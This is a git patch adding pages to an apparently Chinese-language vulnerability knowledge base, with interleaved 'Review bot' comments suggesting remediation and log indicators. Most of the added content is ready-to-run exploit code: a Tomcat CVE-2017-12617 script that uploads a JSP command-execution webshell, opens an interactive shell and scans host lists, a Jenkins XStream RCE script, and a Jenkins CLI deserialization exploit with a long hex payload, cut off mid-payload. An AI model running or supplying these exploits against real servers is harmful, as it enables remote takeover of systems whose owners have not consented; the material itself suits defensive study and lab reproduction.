From 5b41e2c1f9a66b111adc828f831866abc017750a Mon Sep 17 00:00:00 2001
From: Threekiii <472361400@qq.com>
Date: Wed, 30 Nov 2022 16:13:38 +0800
Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md | 2 +-
.../Apache Tomcat RCE via JSP Upload Bypass.md | 261 ++++++++++++++++++
.../Jenkins XStream 反序列化漏洞 CVE-2016-0792.md | 101 +++++++
.../Jenkins 远程代码执行漏洞 CVE-2015-8103.md | 122 ++++++++
.../WebLogic T3 反序列化漏洞 CVE-2016-3510.md | 92 ++++++
.../Citrix 远程命令执行漏洞 CVE-2019-19781.md | 107 +++++++
网络设备漏洞/Untitled.md | 0
7 files changed, 684 insertions(+), 1 deletion(-)
create mode 100644 Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md
create mode 100644 Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md
create mode 100644 Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md
create mode 100644 Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md
create mode 100644 网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md
delete mode 100644 网络设备漏洞/Untitled.md
diff --git a/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md b/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md
index ce82c43..7867761 100644
--- a/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md
+++ b/Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md
@@ -1,6 +1,6 @@
# Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938
-# 漏洞描述
+## 漏洞描述
Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。
diff --git a/Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md b/Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md
new file mode 100644
index 0000000..5fef7f9
--- /dev/null
+++ b/Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md
@@ -0,0 +1,261 @@
+# Apache Tomcat RCE via JSP Upload Bypass CVE-2017-12617
+
+## 漏洞描述
+
+Apache Tomcat版本9.0.0.M1至9.0.0、8.5.0至8.5.22、8.0.0.RC1至8.0.46和7.0.0至7.0.81且启用HTTP PUT时(例如,通过设置只读如果将Default servlet的初始化参数设置为false,则可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。
+
+## 漏洞影响
+
+```
+Apache Tomcat版本9.0.0.M1至9.0.0
+Apache Tomcat版本8.5.0至8.5.22
+Apache Tomcat版本8.0.0.RC1至8.0.46
+Apache Tomcat版本7.0.0至7.0.81
+```
+
+## 漏洞EXP
+
+```python
+#!/usr/bin/python
+# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py
+"""
+./cve-2017-12617.py [options]
+
+
+options:
+
+
+-u ,--url [::] check target url if it's vulnerable
+-p,--pwn [::] generate webshell and upload it
+-l,--list [::] hosts list
+
+
+[+]usage:
+
+
+./cve-2017-12617.py -u http://127.0.0.1
+./cve-2017-12617.py --url http://127.0.0.1
+./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+./cve-2017-12617.py -l hotsts.txt
+./cve-2017-12617.py --list hosts.txt
+"""
+from __future__ import print_function
+from builtins import input
+from builtins import str
+from builtins import object
+import requests
+import re
+import signal
+from optparse import OptionParser
+
+
+
+
+
+
+
+
+class bcolors(object):
+ HEADER = '\033[95m'
+ OKBLUE = '\033[94m'
+ OKGREEN = '\033[92m'
+ WARNING = '\033[93m'
+ FAIL = '\033[91m'
+ ENDC = '\033[0m'
+ BOLD = '\033[1m'
+ UNDERLINE = '\033[4m'
+
+
+
+
+banner="""
+
+
+ _______ ________ ___ ___ __ ______ __ ___ __ __ ______
+ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
+ | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
+ | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
+ | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
+ \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
+
+
+
+[@intx0x80]
+
+"""
+
+
+
+
+
+def signal_handler(signal, frame):
+
+ print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
+
+ exit()
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+
+
+def removetags(tags):
+ remove = re.compile('<.*?>')
+ txt = re.sub(remove, '\n', tags)
+ return txt.replace("\n\n\n","\n")
+
+
+def getContent(url,f):
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+ re=requests.get(str(url)+"/"+str(f), headers=headers)
+ return re.content
+
+def createPayload(url,f):
+ evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+ req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
+ if req.status_code==201:
+ print("File Created ..")
+
+
+def RCE(url,f):
+ EVIL="""
+ <%@ page import="java.io.*" %>
+ <%
+ String cmd = request.getParameter("cmd");
+ String output = "";
+ if(cmd != null) {
+ String s = null;
+ try {
+ Process p = Runtime.getRuntime().exec(cmd,null,null);
+ BufferedReader sI = new BufferedReader(new
+InputStreamReader(p.getInputStream()));
+ while((s = sI.readLine()) != null) { output += s+""; }
+ } catch(IOException e) { e.printStackTrace(); }
+ }
+%>
+<%=output %>
"""
+
+
+
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+ req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
+
+
+
+def shell(url,f):
+
+ while True:
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+ cmd=input("$ ")
+ payload={'cmd':cmd}
+ if cmd=="q" or cmd=="Q":
+ break
+
+ re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
+ re=str(re.content)
+ t=removetags(re)
+ print(t)
+
+
+
+
+
+#print bcolors.HEADER+ banner+bcolors.ENDC
+
+parse=OptionParser(
+
+
+bcolors.HEADER+"""
+
+
+ _______ ________ ___ ___ __ ______ __ ___ __ __ ______
+ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
+ | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
+ | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
+ | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
+ \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
+
+
+
+
+./cve-2017-12617.py [options]
+
+options:
+
+-u ,--url [::] check target url if it's vulnerable
+-p,--pwn [::] generate webshell and upload it
+-l,--list [::] hosts list
+
+[+]usage:
+
+./cve-2017-12617.py -u http://127.0.0.1
+./cve-2017-12617.py --url http://127.0.0.1
+./cve-2017-12617.py -u http://127.0.0.1 -p pwn
+./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
+./cve-2017-12617.py -l hotsts.txt
+./cve-2017-12617.py --list hosts.txt
+
+
+[@intx0x80]
+
+"""+bcolors.ENDC
+
+ )
+
+
+parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
+parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
+parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
+
+(opt,args)=parse.parse_args()
+
+if opt.U==None and opt.P==None and opt.L==None:
+ print(parse.usage)
+ exit(0)
+
+
+
+else:
+ if opt.U!=None and opt.P==None and opt.L==None:
+ print(bcolors.OKGREEN+banner+bcolors.ENDC)
+ url=str(opt.U)
+ checker="Poc.jsp"
+ print(bcolors.BOLD +"Poc Filename {}".format(checker))
+ createPayload(str(url)+"/",checker)
+ con=getContent(str(url)+"/",checker)
+ if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+ print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
+ print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
+
+ else:
+ print('Not Vulnerable to CVE-2017-12617 ')
+ elif opt.P!=None and opt.U!=None and opt.L==None:
+ print(bcolors.OKGREEN+banner+bcolors.ENDC)
+ pwn=str(opt.P)
+ url=str(opt.U)
+ print("Uploading Webshell .....")
+ pwn=pwn+".jsp"
+ RCE(str(url)+"/",pwn)
+ shell(str(url),pwn)
+ elif opt.L!=None and opt.P==None and opt.U==None:
+ print(bcolors.OKGREEN+banner+bcolors.ENDC)
+ w=str(opt.L)
+ f=open(w,"r")
+ print("Scaning hosts in {}".format(w))
+ checker="Poc.jsp"
+ for i in f.readlines():
+ i=i.strip("\n")
+ createPayload(str(i)+"/",checker)
+ con=getContent(str(i)+"/",checker)
+ if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
+ print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
+```
+
+
+
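Review bot: The new page gives the affected versions and an exploit listing but no remediation or detection guidance, and the same gap is in the Jenkins CVE-2016-0792, Jenkins CVE-2015-8103 and WebLogic CVE-2016-3510 pages added further down in this patch. For this page I would add a `## 修复建议` section telling readers to upgrade past the affected ranges listed under 漏洞影响 and to keep the Default servlet `readonly` init-param at `true`, with HTTP PUT disabled where uploads are not needed. The 漏洞描述 sentence is also garbled: `(例如,通过设置只读如果将Default servlet的初始化参数设置为false` never closes its parenthesis and should read `(例如,将Default servlet的初始化参数readonly设置为false)`. Under the listing, note that the `-u` and `-l` modes PUT `Poc.jsp` to the target and never delete it, so it must be removed after a lab run, and that `PUT` requests to a path ending in `.jsp/` answered with 201 are the access-log trace to look for.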
diff --git a/Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md b/Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md
new file mode 100644
index 0000000..d95f4ff
--- /dev/null
+++ b/Web服务器漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md
@@ -0,0 +1,101 @@
+# Jenkins XStream 反序列化漏洞 CVE-2016-0792
+
+## 漏洞描述
+
+国外网站`Contrast Security`于2016年2月24日在公开了Jenkins近日修复的一个可通过低权限用户调用API服务致使的命令执行漏洞详情。通过低权限用户构造一个恶意的XML文档发送至服务端接口,使服务端解析时调用API执行外部命令。
+
+## 漏洞影响
+
+```
+jenkins版本小于1.650(1.650版本已修复该问题)
+```
+
+## 漏洞EXP
+
+```python
+#! /usr/bin/env python2
+
+#Jenkins Groovy XML RCE (CVE-2016-0792)
+#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
+#Made with <3 by @byt3bl33d3r
+
+from __future__ import print_function
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import argparse
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+
+if len(sys.argv) < 2:
+ parser.print_help()
+ sys.exit(1)
+
+args = parser.parse_args()
+
+if len(args.target.split(':')) != 2:
+ print('[-] Target must be in format IP:PORT')
+ sys.exit(1)
+
+if not args.command:
+ print('[-] You must specify a command to run')
+ sys.exit(1)
+
+ip, port = args.target.split(':')
+
+print('[*] Target IP: {}'.format(ip))
+print('[*] Target PORT: {}'.format(port))
+
+xml_formatted = ''
+command_list = args.command.split()
+for cmd in command_list:
+ xml_formatted += '{:>16}{}\n'.format('', cmd)
+
+xml_payload = ''''''.format(xml_formatted.strip())
+
+print('[*] Generated XML payload:')
+print(xml_payload)
+print()
+
+print('[*] Sending payload')
+headers = {'Content-Type': 'text/xml'}
+r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
+
+paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
+if r.status_code == 500:
+ for path in paths_in_trace:
+ if path in r.text:
+ print('[+] Command executed successfully')
+ break
+```
+
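Review bot: The 漏洞描述 says a low-privileged user can trigger the issue, but the header comment of the embedded script states that it only worked when authentication was disabled in Jenkins; the description should carry that caveat, for example `注:脚本作者测试时仅在 Jenkins 未启用认证的情况下利用成功。`. The first sentence also has a stray `在` (`于2016年2月24日在公开了` should be `于2016年2月24日公开了`). For readers triaging logs, it is worth stating next to the listing that the request it sends is a `POST` to `/createItem` with `Content-Type: text/xml`, and that the script treats an HTTP 500 whose body mentions `jobs/rand_dir/config.xml` as success.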
diff --git a/Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md b/Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md
new file mode 100644
index 0000000..0eeb514
--- /dev/null
+++ b/Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md
@@ -0,0 +1,122 @@
+## Jenkins远程代码执行漏洞 CVE-2015-8103
+
+## 漏洞描述
+
+1.638之前的Jenkins和1.625.2之前的LTS中的`Jenkins CLI`子系统,允许远程攻击者通过制作的序列化Java对象执行有问题的`commons-collections`。
+
+## 漏洞影响
+
+```
+Jenkins jenkins<= LTS 1.625.1
+Jenkins jenkins<= 1.637
+```
+
+## 漏洞复现
+
+靶场环境:
+
+- https://github.com/Medicean/VulApps/tree/master/j/jenkins/1
+
+拉取镜像并启动:
+
+```
+$ docker pull medicean/vulapps:j_jenkins_1
+$ docker run -d -p 8080:8080 -p 50000:50000 medicean/vulapps:j_jenkins_1
+```
+
+其中 8080 为 Jenkins web 管理端口,50000 为 Jenkins SLAVE AGENT 端口。
+访问`http://your-ip:8080/`,看到 Jenkins Web 管理界面即代表启动成功。
+
+## 漏洞EXP
+
+```python
+#! /usr/bin/env python2
+
+#Jenkins CLI RMI Java Deserialization RCE (CVE-2015-8103)
+#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
+#Made with <3 by @byt3bl33d3r
+
+from __future__ import print_function
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import socket
+import sys
+import base64
+import argparse
+import os
+from subprocess import check_output
+
+ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
+ysoserial_path = None
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
+
+if len(sys.argv) < 2:
+ parser.print_help()
+ sys.exit(1)
+
+args = parser.parse_args()
+
+if not args.ysoserial_path:
+ for path in ysoserial_default_paths:
+ if os.path.exists(path):
+ ysoserial_path = path
+else:
+ if os.path.exists(args.ysoserial_path):
+ ysoserial_path = args.ysoserial_path
+
+if ysoserial_path is None:
+ print("[-] Could not find ysoserial JAR file")
+ sys.exit(1)
+
+if len(args.target.split(':')) != 2:
+ print('[-] Target must be in format IP:PORT')
+ sys.exit(1)
+
+if not args.command:
+ print('[-] You must specify a command to run')
+ sys.exit(1)
+
+host, port = args.target.split(':')
+
+print('[*] Target IP: {}'.format(host))
+print('[*] Target PORT: {}'.format(port))
+print('\n')
+
+print('[*] Retrieving the Jenkins CLI port')
+#Query Jenkins over HTTP to find what port the CLI listener is on
+r = requests.get('{}://{}:{}'.format(args.proto, host, port))
+cli_port = int(r.headers['X-Jenkins-CLI-Port'])
+
+#Open a socket to the CLI port
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+server_address = (host, cli_port)
+print('[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port))
+sock.connect(server_address)
+
+# Send headers
+headers='\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
+print('[*] Sending headers')
+sock.send(headers)
+
+data = sock.recv(1024)
+print('[*] Received "{}"'.format(data))
+
+if data.find('JENKINS REMOTING CAPACITY') == -1:
+ data = sock.recv(1024)
+ print('[*] Received "{}"'.format(data))
+
+payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command])
+payload_b64 = base64.b64encode(payloadObj)
+payload='\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'+payload_b64+'\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x1
3\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x6
5\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6
d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6